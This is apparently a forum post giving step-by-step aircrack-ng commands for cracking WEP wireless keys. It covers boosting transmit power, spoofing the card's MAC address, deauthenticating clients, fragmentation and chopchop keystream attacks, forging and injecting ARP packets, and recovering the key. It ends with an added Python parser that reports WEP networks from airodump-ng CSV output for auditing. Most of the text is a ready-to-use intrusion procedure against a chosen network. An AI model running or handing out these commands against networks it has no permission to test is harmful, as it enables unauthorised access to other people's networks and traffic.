aireplay-ng -3 -b "AP MAC" wlan0
aireplay-ng -1 0 -e "AP NAME" -a "AP MAC" wlan0
aireplay-ng -0 10 -a "AP MAC" -c "CL MAC" wlan0
aircrack-ng -s -b "AP MAC" output*.cap

EDIT: First enable high power on your awus036h to make it inject over even greater distances (using the r8187 driver):

modprobe -r rtl8187
modprobe r8187
iwpriv wlan0 highpower 1
iwconfig wlan0 txpower 27

Now bring it up in monitor mode and follow the steps below.

1 - Start airodump on the correct channel/bssid:

airodump-ng -c CHANNELAP --bssid BSSIDAP -w dlink wlan0

2 - Try the fragmentation attack first; if successful, it will always give you a 1500 byte XOR file (you might have to try a few different packets before it works):

aireplay-ng -5 -b BSSIDAP -r dlink-01.cap wlan0

3 - If fragmentation doesn't work, try chopchop instead, but keep this in mind: if you use a XOR file obtained from a chopchop attack, be sure it is at least 144 bytes long. That means you should select a packet from the AP to chopchop that is at least 144 bytes, so it results in a 144 byte XOR file (keystream):

aireplay-ng -4 -b BSSIDAP -r dlink-01.cap wlan0

4 - Once you get a valid XOR file, from either chopchop or fragmentation, that is 144 bytes or bigger, you can use it for fake Shared Key Authentication:

aireplay-ng -1 0 -a BSSIDAP -y NAMEOFXORFILE.xor wlan0

5 - If authentication is successful, it's time to forge an ARP packet:

packetforge-ng -0 -a BSSIDAP -h YOURCARDSMAC -k 255.255.255.255 -l 255.255.255.255 -y NAMEOFXORFILE.xor -w arp

6 - Inject your forged ARP packet:

aireplay-ng -3 -b BSSIDAP -r arp wlan0

7 - The IV/data rate goes up in airodump, so you can now crack the key with aircrack:

aircrack-ng dlink*.cap 00:1E:58:9B:37:7c

NOTES

These are all different colors because they coordinate with parts of the code you will have to change when typing them.

wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
fragment-*.xor = The * being replaced by a number (Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Ignore:
-------------------------------------------------------------------------
WEP CRACK GUIDE

1. Boot computer with Backtrack 4 (login: root, pass: toor / poweroff at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 **My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!**
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding the WEP network you want to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
-------------------------------------------------------------------------
ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK

**Be sure to open new Konsoles when necessary**

http://forum.aircrack-ng.org/index.php?topic=7430.0
http://www.enigmagroup.org/articles/view/WiFi%20Hacking/2-How-to-crack-WEP
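The airodump-ng capture started with -w in step 1 (and step 10 of the guide) also writes a "(file name)-01.csv" next to the .cap. The following parser for that CSV is an added example, not code from the original post or the aircrack-ng project: it lists which networks in a survey are still WEP, whether shared key authentication (SKA) was seen, how many IVs have been captured and which stations are associated, so an administrator can find and retire the legacy APs in their own estate before anyone runs the steps above against them. The sample data is constructed; the column layout is the one airodump-ng writes.

```python
"""Parse airodump-ng's CSV output and report the networks still running WEP."""

# Constructed sample in airodump-ng's CSV layout (AP section, then station section); not a real capture.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:1E:58:9B:37:7C, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, SKA, -40,  300,  48211,   0.  0.  0.  0,   5, dlink, 
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  280,      0,   0.  0.  0.  0,   7, linksys, 
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN ,    ,     , -70,  120,      0,   0.  0.  0.  0,   7, default, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -30,  9000, 00:1E:58:9B:37:7C, dlink
"""

AP_FIELDS, STA_FIXED_FIELDS = 15, 6  # AP columns (ESSID is 13, Key 14); station columns before "Probed ESSIDs"

def parse_airodump_csv(text):
    """Split the CSV into AP rows and station rows (dicts keyed by the header names)."""
    aps, stations, header = [], [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split(",")]
        if fields[0] in ("BSSID", "Station MAC"):
            header = fields  # each section starts with its own header line
            continue
        if header is None:
            continue  # stray text before the first header (airodump does not write any)
        if header[0] == "BSSID":
            # An ESSID containing commas spills into extra fields; fold them back into ESSID.
            if len(fields) > AP_FIELDS:
                fields = fields[:13] + [", ".join(fields[13:-1])] + [fields[-1]]
            aps.append(dict(zip(header, fields)))
        else:
            row = dict(zip(header[:STA_FIXED_FIELDS], fields[:STA_FIXED_FIELDS]))
            row["Probed ESSIDs"] = [p for p in fields[STA_FIXED_FIELDS:] if p]
            stations.append(row)
    return aps, stations

def wep_report(text):
    """List every WEP network with its auth mode (SKA = shared key seen), IV count and clients."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for sta in stations:
        clients.setdefault(sta["BSSID"], []).append(sta["Station MAC"])
    report = [{"bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
               "auth": ap["Authentication"], "ivs": int(ap["# IV"]),
               "clients": clients.get(ap["BSSID"], [])}
              for ap in aps if ap["Privacy"].upper() == "WEP"]
    # Most IVs first: the AP with the most captured IVs is the one closest to having its key recovered.
    return sorted(report, key=lambda r: r["ivs"], reverse=True)
```

Run it against the real "(file name)-01.csv" by passing the file's contents to wep_report(); an empty result means no WEP network was seen on the surveyed channels.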